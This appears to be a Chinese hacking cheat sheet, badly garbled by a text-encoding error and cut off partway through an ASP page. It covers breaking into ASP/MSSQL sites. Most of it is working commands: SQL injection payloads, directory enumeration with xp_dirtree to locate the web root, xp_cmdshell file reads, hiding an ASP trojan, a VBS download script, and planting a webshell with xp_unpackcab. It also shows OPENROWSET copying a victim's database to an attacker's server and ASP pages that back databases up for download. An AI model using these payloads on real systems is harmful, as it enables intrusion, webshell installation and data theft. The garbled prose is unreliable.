8錛夊埄鐢⊿QL璇彞鏉ユ煡鎵網(wǎng)EB鐩綍錛氭牴鎹粡楠岋紝鐚滅枒WEB鏍圭洰褰曠殑欏哄簭鏄細(xì)d鐩樸乪鐩樸乧鐩橈紝棣栧厛鎴戜滑寤虹珛涓涓復(fù)鏃惰〃鐢ㄤ簬瀛樻斁master..xp_dirtree(閫傚悎浜巔ublic)鐢熸垚鐨勭洰褰曟爲(wèi),鐢ㄤ互涓嬭鍙ワ細(xì)
;create table temp(dir nvarchar(255),depth varchar(255));--,璇ヨ〃鐨刣ir瀛楁琛ㄧず鐩綍鐨勫悕縐幫紝depth瀛楁琛ㄧず鐩綍鐨勬繁搴︺傜劧鍚庢墽琛寈p_dirtree鑾峰緱D鐩樼殑鐩綍鏍?wèi)锛岃鍙ュ涓嬪Q?
;insert temp(dir,depth) exec master.dbo.xp_dirtree 'd:';--

鍦ㄨ繘琛屼笅闈㈢殑鎿嶄綔鍓嶏紝鍏堟煡鐪婦鐩樻湁鍑犱釜鏂囦歡澶癸紝榪欐牱瀵笵鐩樻湁涓ぇ鑷寸殑浜?jiǎn)瑙eQ岃鍙ュ涓嬶細(xì)
and (select count(*) from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 鍗?))>=鏁板瓧(鏁板瓧=0銆?銆?銆?...)

鎺ョ潃錛屾垜浠湪瀵規(guī)柟鐨勭綉绔欎笂鎵懼嚑涓竴綰у瓙鐩綍錛屽user銆乸hoto錛岀劧鍚庯紝鐢ㄧ瓫閫夌殑鏂規(guī)硶鏉ュ垽鏂璚EB鏍圭洰褰曚笂鏄惁瀛樺湪姝ょ洏?shù)笂锛岃鍙ュ涓嬪Q?
and (select count(*) from temp where dir<>'user')<(select count(*) from temp)

鐪嬭鍙ョ殑榪斿洖緇撴灉錛屽鏋滀負(fù)鐪燂紝琛ㄧずWEB鏍圭洰褰曟湁鍙兘鍦ㄦ鐩樹(shù)笂錛屼負(fù)浜?jiǎn)杩涗竴姝ョ‘璁わ紝澶氭祴璇曞嚑涓瓙鐩綍錛?
and (select count(*) from temp where dir<>'photo')<(select count(*) from temp)

...

濡傛灉鎵鏈夌殑嫻嬭瘯緇撴灉閮戒負(fù)鐪燂紝琛ㄧずWEB鏍圭洰褰曞緢鏈夊彲鑳藉湪姝ょ洏?shù)笂銆?

涓嬮潰鍋囪鎵懼埌鐨刉EB鏍圭洰褰曞湪姝ょ洏?shù)笂锛岀敤浠ヤ笅鐨勮鍙ユ潵鑾峰緱涓綰у瓙鐩綍鐨勬繁搴︼細(xì)
and (select depth from temp where dir='user')>=鏁板瓧(鏁板瓧=1銆?銆?...)

鍋囪寰楀埌鐨刣epth鏄?,璇存槑user鐩綍鏄疍鐩樼殑3綰х洰褰曪紝鍒橶EB鏍圭洰褰曟槸D鐩樼殑浜岀駭鐩綍銆?

鐩墠鎴戜滑宸茬粡鐭ラ亾浜?jiǎn)鏍圭洰褰曟墍鍦ㄧ殑鐩樼鍜屾繁搴︼紝瑕佹壘鍒版牴鐩綍鐨勫叿浣撲綅緗紝鎴戜滑鏉ヤ粠D鐩樻牴鐩綍寮濮嬮愪竴鎼滃錛屽綋鐒?dòng)灱屾病鏈夊繀瑕佺煡閬撴瘡涓洰褰曠殑鍚嵖U幫紝鍚﹀垯澶楄垂鏃墮棿浜?jiǎn)銆?

鎺ヤ笅鏉ワ紝鍙﹀寤虹珛涓涓復(fù)鏃惰〃錛岀敤鏉ュ瓨鏀綝鐩樼殑1綰у瓙鐩綍涓嬬殑鎵鏈夌洰褰曪紝璇彞濡備笅錛?

;create table temp1(dir nvarchar(255),depth varchar(255));--

鐒跺悗鎶婁粠D鐩樼殑絎竴涓瓙鐩綍涓嬬殑鎵鏈夌洰褰曞瓨鍒皌emp1涓紝璇彞濡備笅錛?
declare @dirname varchar(255);set @dirname='d:\'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 鍗?) order by dir desc)T order by dir);insert into temp1 exec master.dbo.xp_dirtree @dirname
褰撶劧涔熷彲浠ユ妸D鐩樼殑絎簩涓瓙鐩綍涓嬬殑鎵鏈夌洰褰曞瓨鍒皌emp1涓紝鍙渶鎶婄浜屼釜top 1鏀逛負(fù)top 2灝辮浜?jiǎn)銆?

鐜板湪錛宼emp1涓凡緇忎繚瀛樹(shù)簡(jiǎn)鎵鏈塂鐩樼涓綰у瓙鐩綍涓嬬殑鎵鏈夌洰褰?鐒跺悗錛屾垜浠敤鍚屾牱鐨勬柟娉曟潵鍒ゆ柇鏍圭洰褰曟槸鍚﹀湪姝や竴綰у瓙鐩綍涓嬶細(xì)
and (select count(*) from temp1 where dir<>'user')<(select count(*) from temp1)
濡傛灉榪斿洖涓虹湡錛岃〃紺烘牴鐩綍鍙兘鍦ㄦ瀛愮洰褰曚笅錛岃浣忚澶氭祴璇曞嚑涓緥瀛愶紝濡傛灉閮借繑鍥炰負(fù)鍋囷紝鍒欒〃鏄嶹EB鏍圭洰褰曚笉鍦ㄦ鐩綍涓嬶紝鐒跺悗鎴戜滑鍦ㄧ敤鍚屾牱鐨勬柟娉曟潵鑾峰緱D鐩樼2銆?...涓瓙鐩綍涓嬬殑鎵鏈夌洰褰曞垪琛紝鏉ュ垽鏂璚EB鏍圭洰褰曟槸鍚﹀湪鍏朵笅銆備絾鏄紝瑕佹敞鎰忥紝鐢▁p_dirtree鍓嶄竴瀹氳鎶妕emp1琛ㄤ腑鐨勫唴瀹瑰垹闄ゃ?

鐜板湪鍋囪錛學(xué)EB鏍圭洰褰曞湪D鐩樼殑絎竴綰у瓙鐩綍涓嬶紝璇ュ瓙鐩綍鍚嶇О涓簑ebsite,鎬庢牱鑾峰緱榪欎釜鐩綍鐨勫悕縐版垜鎯充笉鐢ㄦ垜璇翠簡(jiǎn)鍚с傚洜涓哄墠闈㈡垜浠煡閬撲簡(jiǎn)WEB鏍圭洰褰曠殑娣卞害涓?錛屾垜浠渶瑕佺煡閬搘ebsite涓嬪埌搴曞摢涓墠鏄湡姝g殑WEB鏍圭洰褰曘?

鐜板湪錛屾垜浠敤鍚屾牱鐨勬柟娉曪紝鍐嶅緩绔嬬3涓復(fù)鏃惰〃錛?
;create table temp2(dir nvarchar(255),depth varchar(255));--

鐒跺悗鎶婁粠D鐩樼殑website涓嬬殑鎵鏈夌洰褰曞瓨鍒皌emp2涓紝璇彞濡備笅錛?
declare @dirname varchar(255);set @dirname='d:\website\'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 鍗?) order by dir desc)T order by dir);insert into temp2 exec master.dbo.xp_dirtree @dirname
褰撶劧涔熷彲浠ユ妸D鐩樼殑website涓嬬浜屼釜瀛愮洰褰曚笅鐨勬墍鏈夌洰褰曞瓨鍒皌emp2涓紝鍙渶鎶婄浜屼釜top 1鏀逛負(fù)top 2灝辮浜?jiǎn)銆?

鐜板湪錛屾垜浠敤鍚屾牱鐨勬柟娉曞垽鏂鐩綍鏄惁涓烘牴鐩綍錛?
and (select count(*) from temp2 where dir<>'user')<(select count(*) from temp2)
濡傛灉榪斿洖涓虹湡錛屼負(fù)浜?jiǎn)纭畾鎴戜滑鐨勫垽鏂Q屽嫻嬭瘯鍑犱釜渚嬪瓙錛屾柟娉曚笂闈㈤兘璁插埌浜?jiǎn)锛屽鏋滃涓緥瀛愰兘杩斿洖湄?fù)鐪燂紝閭d箞灝辯‘瀹氫簡(jiǎn)璇ョ洰褰曚負(fù)WEB鏍圭洰褰曘?


鐢ㄤ互涓婄殑鏂規(guī)硶鍩烘湰涓婂彲浠ヨ幏寰梂EB鏍圭洰褰曪紝鐜板湪鎴戜滑鍋囪W(wǎng)EB鏍圭洰褰曟槸錛欴:\website\www
鐒跺悗錛屾垜浠氨鍙互澶囦喚褰撳墠鏁版嵁搴撳埌榪欎釜鐩綍涓嬬敤鏉ヤ笅杞姐傚浠藉墠鎴戜滑鎶妕emp銆乼emp1銆乼emp2鐨勫唴瀹規(guī)竻絀猴紝鐒跺悗C銆丏銆丒鐩樼殑鐩綍鏍?wèi)鍒嗗埆瀛樺埌temp銆乼emp1銆乼emp2涓?

涓嬭澆瀹屾暟鎹簱鍚庤璁板緱鎶婁笁涓復(fù)鏃惰〃DROP鎺夛紝鐜板湪鎴戜滑鍦ㄤ笅杞界殑鏁版嵁搴撲腑鍙互鎵懼埌鎵鏈夌殑鐩綍鍒楄〃錛屽寘鎷悗鍙扮鐞嗙殑鐩綍浠ュ強(qiáng)鏇村淇℃伅銆?br>
21銆亀in2000涓嬪皢WEB鐢ㄦ埛鎻愬崌涓虹郴緇熺敤鎴鋒潈闄愶紝闇瑕佹湁綆$悊鍛樼殑鏉冮檺鎵嶈兘鎵ц錛?br>c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"

cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\windows\system32\idq.dll" "C:\windows\system32\inetsrv\httpext.dll" "C:\windows\system32\inetsrv\httpodbc.dll" "C:\windows\system32\inetsrv\ssinc.dll" "C:\windows\system32\msw3prt.dll" "C:\windows\system32\inetsrv\asp.dll"

鏌ョ湅鏄惁鎴愬姛錛?br>c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

Microsoft (R) Windows Script Host Version 5.6
鐗堟潈鎵鏈?C) Microsoft Corporation 1996-2001銆備繚鐣欐墍鏈夋潈鍒┿?br>inprocessisapiapps       : (LIST) (6 Items)
"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"
"c:\winnt\system32\inetsrv\asp.dll"

22銆佸浣曢殣钘廇SP鏈ㄩ┈錛?br>寤虹珛闈炴爣鍑嗙洰褰曪細(xì)mkdir images..\
鎷瘋礉ASP鏈ㄩ┈鑷崇洰褰曪細(xì)copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
閫氳繃web璁塊棶ASP鏈ㄩ┈錛?a href="http://ip/images../news.asp?action=login" target=_blank>http://ip/images../news.asp?action=login
濡備綍鍒犻櫎闈炴爣鍑嗙洰褰曪細(xì)rmdir images..\ /s

23銆佸幓鎺塼enlnet鐨刵tlm璁よ瘉錛?br>;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'鈥?br>
24銆佺敤echo鍐欏叆鏂囦歡涓嬭澆鑴氭湰iget.vbs:
(1)echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >c:\iget.vbs

(2)c:\>cscript iget.vbs http://127.0.0.1/asp/dbm6.asp dbm6.asp


25銆佹墜宸ュ緩绔婭IS闅愯棌鐩綍鐨勬柟娉曪細(xì)
?   鏌ョ湅鏈湴铏氭嫙鐩綍鍒楄〃錛歝script.exe c:\inetpub\AdminScripts\adsutil.vbs enum w3svc/1/root
?   鏂板緩涓涓猭iss鐩綍錛歮kdir c:\asp\kiss
?   寤虹珛kiss铏氭嫙鐩綍錛歝script.exe c:\inetpub\AdminScripts\mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "kiss","c:\asp\kiss"  
?   涓簁iss鐩綍鍔犳墽琛屽拰鍐欐潈闄愶細(xì)
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/kiss/accesswrite "true" -s:
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/accessexecute "true" -s:
?   ?:Cscript c:\inetpub\AdminScripts\adsutil.vbs set /w3svc/1/root/kiss/createprocessasuser false
?   璁塊棶錛?a target=_blank>http://127.0.0.1/kiss/test.asp

26銆佷嬌鐢╫penrowset()榪炲洖鏈湴鍋氭祴璇曪細(xì)
SELECT a.*
FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'SELECT * FROM [dvbbs].[dbo].[dv_admin]') AS a

SELECT * FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'SELECT * FROM [dvbbs].[dbo].[dv_admin]')

27銆佽幏寰椾富鏈哄悕錛?br>http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)--
select convert(int,@@servername)
select @@servername

28銆佽幏寰楁暟鎹簱鐢ㄦ埛鍚嶏細(xì)
http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)--
http://www.19cn.com/showdetail.asp?id=49 and user>0
select user

29銆佹櫘閫氱敤鎴瘋幏寰梂EBSHELL鐨勬柟娉曚箣浜岋細(xì)
?   鎵撳寘錛?br>EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'
瑙e寘錛屽彲浠ョ敤浜庡緱鍒皐ebshell錛?br>?   EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp'
?   璇諱換鎰忔枃浠跺唴瀹癸紝瑕佹眰鏈塵aster鐨刣bo鏉冮檺錛?br>EXEC [master].[dbo].[xp_readerrorlog] 1,'c:\cmd.asp'

30銆乻a 鏉冮檺涓嬪凡鐭eb璺緞鐩存帴澶囦喚鏁版嵁搴撳埌web璺緞涓?br>
http://www.XXXX.com/FullStory.asp?id=1;backuup database 鏁版嵁搴撳悕 to disk='c:\inetpub\wwwroot\save.db' 鍒欐妸寰楀埌鐨勬暟鎹唴瀹瑰叏閮ㄥ浠藉埌WEB鐩綍涓嬶紝鍐嶇敤HTTP鎶婃鏂囦歡涓嬭澆(褰撶劧棣栭夎鐭ラ亾WEB铏氭嫙鐩綍)銆?br>
?   閬嶅巻緋葷粺鐨勭洰褰曠粨鏋勶紝鍒嗘瀽緇撴灉騫跺彂鐜癢EB铏氭嫙鐩綍錛屽厛鍒涘緩涓涓復(fù)鏃惰〃錛歵emp
http://www.XXXX.com/FullStory.asp?id=1;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
?   銆鎺ヤ笅鏉ワ細(xì)鎴戜滑鍙互鍒╃敤xp_availablemedia鏉ヨ幏寰楀綋鍓嶆墍鏈夐┍鍔ㄥ櫒,騫跺瓨鍏emp琛ㄤ腑錛?br>http://www.XXXX.com/FullStory.asp?id=1;insert temp exec master.dbo.xp_availablemedia;--
?   鎴戜滑鍙互閫氳繃鏌ヨtemp鐨勫唴瀹規(guī)潵鑾峰緱椹卞姩鍣ㄥ垪琛ㄥ強(qiáng)鐩稿叧淇℃伅鎴栬呭埄鐢▁p_subdirs鑾峰緱瀛愮洰褰曞垪琛?騫跺瓨鍏emp琛ㄤ腑錛?br>http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
?   鎴戜滑榪樺彲浠ュ埄鐢▁p_dirtree鑾峰緱鎵鏈夊瓙鐩綍鐨勭洰褰曟爲(wèi)緇撴瀯,騫跺鍏emp琛ㄤ腑錛?br>http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 榪欐牱灝卞彲浠ユ垚鍔熺殑嫻忚鍒版墍鏈夌殑鐩綍錛堟枃浠跺す錛夊垪琛?br>?   濡傛灉鎴戜滑闇瑕佹煡鐪嬫煇涓枃浠剁殑鍐呭錛屽彲浠ラ氳繃鎵цxp_cmdsell錛?insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
?   浣跨敤'bulk insert'璇硶鍙互灝嗕竴涓枃鏈枃浠舵彃鍏ュ埌涓涓復(fù)鏃惰〃涓傚錛歜ulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'   嫻忚temp灝卞彲浠ョ湅鍒癷ndex.asp鏂囦歡鐨勫唴瀹逛簡(jiǎn)錛侀氳繃鍒嗘瀽鍚勭ASP鏂囦歡錛屽彲浠ュ緱鍒板ぇ閲忕郴緇熶俊鎭紝W(xué)EB寤鴻涓庣鐞嗕俊鎭紝鐢氳嚦鍙互寰楀埌SA甯愬彿鐨勮繛鎺ュ瘑鐮併?br>
31銆佷竴浜泂ql涓殑鎵╁睍瀛樺偍鐨勬葷粨:
xp_availablemedia 鏄劇ず緋葷粺涓婂彲鐢ㄧ殑鐩樼'C:\' xp_availablemedia
xp_enumgroups 鍒楀嚭褰撳墠緋葷粺鐨勪嬌鐢ㄧ兢緇勫強(qiáng)鍏惰鏄?xp_enumgroups
xp_enumdsn 鍒楀嚭緋葷粺涓婂凡緇忚緗ソ鐨凮DBC鏁版嵁婧愬悕縐?xp_enumdsn
xp_dirtree 鏄劇ず鏌愪釜鐩綍涓嬬殑瀛愮洰褰曚笌鏂囦歡鏋舵瀯 xp_dirtree 'C:\inetpub\wwwroot\'
xp_getfiledetails 鑾峰彇鏌愭枃浠剁殑鐩稿叧灞炴?xp_getfiledetails 'C:\inetpub\wwwroot.asp'
dbp.xp_makecab 灝嗙洰鏍囪綆楁満澶氫釜妗f鍘嬬緝鍒版煇涓。妗堥噷鎵鍘嬬緝鐨勬。妗堥兘鍙互鎺ュ湪鍙傛暟鐨勫悗闈㈢敤璞嗗彿闅斿紑 dbp.xp_makecab 'C:\lin.cab','evil',1,'C:\inetpub\mdb.asp'
xp_unpackcab 瑙e帇緙?xp_unpackcab 'C:\hackway.cab','C:\temp',1
xp_ntsec_enumdomains 鍒楀嚭鏈嶅姟鍣ㄥ煙鍚?xp_ntsec_enumdomains
xp_servicecontrol 鍋滄鎴栬呭惎鍔ㄦ煇涓湇鍔?xp_servicecontrol 'stop','schedule'
xp_terminate_process 鐢╬id鏉ュ仠姝㈡煇涓墽琛屼腑鐨勭▼搴?xp_terminate_process 123
dbo.xp_subdirs 鍙垪鏌愪釜鐩綍涓嬬殑瀛愮洰褰?dbo.xp_subdirs 'C:\'

32銆?br>USE MASTER
GO
CREATE proc sp_MSforeachObject
@objectType int=1,
@command1 nvarchar(2000),
@replacechar nchar(1) = N'?',
@command2 nvarchar(2000) = null,
@command3 nvarchar(2000) = null,
@whereand nvarchar(2000) = null,
@precommand nvarchar(2000) = null,
@postcommand nvarchar(2000) = null
as
/* This proc returns one or more rows for each table (optionally, matching @where), with each table defaulting to its
own result set */
/* @precommand and @postcommand may be used to force a single result set via a temp table. */
/* Preprocessor won't replace within quotes so have to use str(). */
declare @mscat nvarchar(12)
select @mscat = ltrim(str(convert(int, 0x0002)))
if (@precommand is not null)
exec(@precommand)
/* Defined @isobject for save object type */
Declare @isobject varchar(256)
select @isobject= case @objectType when 1 then 'IsUserTable'
when 2 then 'IsView'
when 3 then 'IsTrigger'
when 4 then 'IsProcedure'
when 5 then 'IsDefault'
when 6 then 'IsForeignKey'
when 7 then 'IsScalarFunction'
when 8 then 'IsInlineFunction'
when 9 then 'IsPrimaryKey'
when 10 then 'IsExtendedProc'
when 11 then 'IsReplProc'
when 12 then 'IsRule'
    end
/* Create the select */
/* Use @isobject variable isstead of IsUserTable string */
EXEC(N'declare hCForEach cursor global for select ''['' + REPLACE(user_name(uid), N'']'', N'']]'') + '']'' + ''.'' + ''['' +
REPLACE(object_name(id), N'']'', N'']]'') + '']'' from dbo.sysobjects o '
+ N' where OBJECTPROPERTY(o.id, N'''+@isobject+''') = 1 '+N' and o.category & ' + @mscat + N' = 0 '
+ @whereand)
declare @retval int
select @retval = @@error
if (@retval = 0)
    exec @retval = sp_MSforeach_worker @command1, @replacechar, @command2, @command3
if (@retval = 0 and @postcommand is not null)
    exec(@postcommand)
return @retval
GO


/*
1銆傝幏寰楁墍鏈夌殑瀛樺偍榪囩▼鐨勮剼鏈細(xì)
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=4
2銆傝幏寰楁墍鏈夌殑瑙嗗浘鐨勮剼鏈細(xì)
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=2

EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=1
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=2
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=3
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=4
*/

33銆丏B_OWNER鏉冮檺涓嬬殑鏁版嵁搴撳浠芥柟娉?br>鐢╫penrowset鍚с傚弽榪炲埌鑷繁鐨勬暟鎹簱鏈哄櫒錛寏鍏堝湪鏈湴寤轟釜璺熺洰鏍囨満鍣ㄤ竴鏍風(fēng)粨鏋勭殑琛▇瀛楁綾誨瀷浣跨敤nvarchar.鐒跺悗鐢ㄦ搗媧嬭繛鎺ュ鏂圭殑SQL鏁版嵁搴擄紝鍦ㄦ煡璇㈠垎鏋愰偅閲屾墽琛?br>insert into OPENROWSET ('sqloledb','server=浣犳暟鎹簱鏈嶅姟鍣ㄧ殑IP;uid=user;pwd=pass;database=dbname;','select * from 浣犲緩绔嬬殑琛? select * from 瀵規(guī)柟鐨勮〃鈥?br>瑕佹槸鏁版嵁閲忓お澶х殑璇濆氨鐪嬬湅浠栨暟鎹簱閲屾湁娌℃湁鑷姩緙栧彿鐨勫瓧孌?select * from 琛ㄥ悕 where id>100
榪欐牱鏉ュ紕鍚?br>瑕佹槸鍜學(xué)EB鍚屽彴鐨勮瘽錛岀洿鎺ュ皢搴揃AK鍒癢EB鐩綍涓嬪洖鏉ュ氨O(jiān)K鍟︺傘傘備笉榪囧墠鎻愬簱涓嶈兘澶ぇ錛岃秴榪?G鐨勮瘽SQL灝辮秴鏃朵簡(jiǎn)
濡傛灉鏄疭A鏉冮檺鍙互鍒╃敤涓嬮潰鐨勪袱涓狝SP紼嬪簭鏉ュ浠芥暟鎹簱錛?br>
sqlbackup1.asp
<HTML>
<HEAD>
<TITLE>SQL Server 鏁版嵁搴撶殑澶囦喚涓庢仮澶?lt;/TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</HEAD>
<BODY>
<form method="post" name=myform>
閫夋嫨鎿嶄綔錛?lt;INPUT TYPE="radio" NAME="act" id="act_backup" value="backup"><label for=act_backup>澶囦喚</label>銆
<INPUT TYPE="radio" NAME="act" id="act_restore" value="restore"><label for=act_restore>鎭㈠</label>
<br>鏁版嵁搴撳悕錛?lt;INPUT TYPE="text" NAME="databasename" value="<%=request("databasename")%>">
<br>鏂囦歡璺緞錛?lt;INPUT TYPE="text" NAME="bak_file" value="c:\1.exe">(澶囦喚鎴栨仮澶嶇殑鏂囦歡璺緞,澶囦喚鎴怑XE涓昏涓轟簡(jiǎn)鏂逛究涓嬭澆,媧繪椿..)<br>
<input type="submit" value="紜畾">
</form>
<%
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = "localhost" 'sql鏈嶅姟鍣?br>sqlname = "sa" '鐢ㄦ埛鍚?br>sqlpassword = "鏁版嵁搴撳瘑鐮? '瀵嗙爜
sqlLoginTimeout = 15 '鐧婚檰瓚呮椂
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "input database name"
else
if act = "backup" then
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.CreateObject("SQLDMO.Backup")
bak.Database=databasename
bak.Devices=Files
bak.Files=bak_file
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
Response.write "<font color=green>澶囦喚鎴愬姛!</font>"
elseif act = "restore" then
'鎭㈠鏃惰鍦ㄦ病鏈変嬌鐢ㄦ暟鎹簱鏃惰繘琛岋紒
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.CreateObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
rest.SQLRestore srv

Response.write "<font color=green>鎭㈠鎴愬姛!</font>"
else
Response.write "<font color=red>娌℃湁閫夋嫨鎿嶄綔</font>"
end if
end if
%>
</BODY>
</HTML>

sqlbackup2.asp
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>閲囬鎵珹SP澶囦喚MSSQL鏁版嵁搴撶▼搴?V1.0--QQ:79998575</title>
</head>
<style>
BODY {   FONT-SIZE: 9pt;   COLOR: #000000;   FONT-FAMILY: "Courier New";   scrollbar-face-color:#E4E4F3;   scrollbar-highlight-color:#FFFFFF;   scrollbar-3dlight-color:#E4E4F3;   scrollbar-darkshadow-color:#9C9CD3;   scrollbar-shadow-color:#E4E4F3;   scrollbar-arrow-color:#4444B3;   scrollbar-track-color:#EFEFEF;}TABLE {   FONT-SIZE: 9pt;   FONT-FAMILY: "Courier New";   BORDER-COLLAPSE: collapse;   border-top-width: 1px;   border-right-width: 1px;   border-bottom-width: 1px;   border-left-width: 1px;   border-top-style: solid;   border-right-style: none;   border-bottom-style: none;   border-left-style: solid;   border-top-color: #d8d8f0;   border-right-color: #d8d8f0;   border-bottom-color: #d8d8f0;   border-left-color: #d8d8f0;}.tr {   font-family: "Courier New";   font-size: 9pt;   background-color: #e4e4f3;   text-align: center;}.td {   font-family: "Courier New";   font-size: 9pt;   background-color: #f9f9fd;}.warningColor {   font-family: "Courier New";   font-size: 9pt;   color: #ff0000;}input {
font-family: "Courier New";
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}textarea {   font-family: "Courier New";   BORDER-TOP-WIDTH: 1px;   BORDER-LEFT-WIDTH: 1px;   FONT-SIZE: 12px;   BORDER-BOTTOM-WIDTH: 1px;   BORDER-RIGHT-WIDTH: 1px;   color: #000000;}.liuyes {
background-color: #CCCCFF;
}
A:link {   FONT-SIZE: 9pt;   COLOR: #000000;   FONT-FAMILY: "Courier New";   TEXT-DECORATION: none;}tr {   font-family: "Courier New";   font-size: 9pt;   line-height: 18px;}td {   font-family: "Courier New";   font-size: 9pt;   border-top-width: 1px;   border-right-width: 1px;   border-bottom-width: 1px;   border-left-width: 1px;   border-top-style: none;   border-right-style: solid;   border-bottom-style: solid;   border-left-style: none;   border-top-color: #d8d8f0;   border-right-color: #d8d8f0;   border-bottom-color: #d8d8f0;   border-left-color: #d8d8f0;}.trHead {   font-family: "Courier New";   font-size: 9pt;   background-color: #e4e4f3;   line-height: 3px;}.inputLogin {   font-family: "Courier New";   font-size: 9pt;   border: 1px solid #d8d8f0;   background-color: #f9f9fd;   vertical-align: bottom;}</style>
<body>
<form method="post" name="myform" action="?action=backupdatabase">
<table width="686" border="1" align="center">
<tr>
<td width="613" height="30" align="center" bgcolor="#330066"><font color="#FFFFFF">閲囬鎵珹SP澶囦喚MSSQL鏁版嵁搴撶▼搴?V1.0 </font></td>
</tr>
<tr>
<td>閫夋嫨鎿嶄綔錛?br>  <input type="radio" name="act" id="act_backup"value="backup" />
  <label for=act_backup>澶囦喚</label>
  <input type="radio" name="act" id="act_restore" value="restore" />
  <label for=act_restore>鎭㈠</label></td>
</tr>
<tr>
<td><label>SQL鏈嶅姟鍣?
  <input type="text" name="sqlserver" value="localhost" />
</label></td>
</tr>
<tr>
<td><label>鐢ㄦ埛鍚?
  <input name="sqlname" type="text" value="sa" />
瀵?鐮?
<input type="text" name="sqlpassword" />
</label></td>
</tr>
<tr>
<td><label>鏁版嵁搴撳悕錛?br>  <input type="text" name="databasename" value="<%=request("databasename")%>" />
</label></td>
</tr>
<tr>
<td>鏂囦歡璺緞錛?br>  <input name="bak_file" type="text" value="<% =server.MapPath("\")&"\"&"liuyes.bak"%>" size="60" />
(澶囦喚鎴栨仮澶嶇殑鏂囦歡璺緞)</td>
</tr>
<tr>
<td><% Response.write "鏈枃浠剁粷瀵硅礬寰?" %>
  <font color="#FF0000">
  <% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
  </font></td>
</tr>
<tr>
<td><input name=submit1 type="submit" class="liuyes" id=submit1 size="10" value="紜?瀹? />
    <input name="Submit" type="reset" class="liuyes" size="10" value="閲?緗? /></td>
</tr>
</table>
</form>
<table width="686" border="1" align="center">
<tr>
<td>鎻愮ず淇℃伅:<%
if request("action")="" then  
response.write "<font color=#ff0000>涓嶇敤鎴戝璇翠粈涔堜簡(jiǎn)鍚э紒</font>"
end if
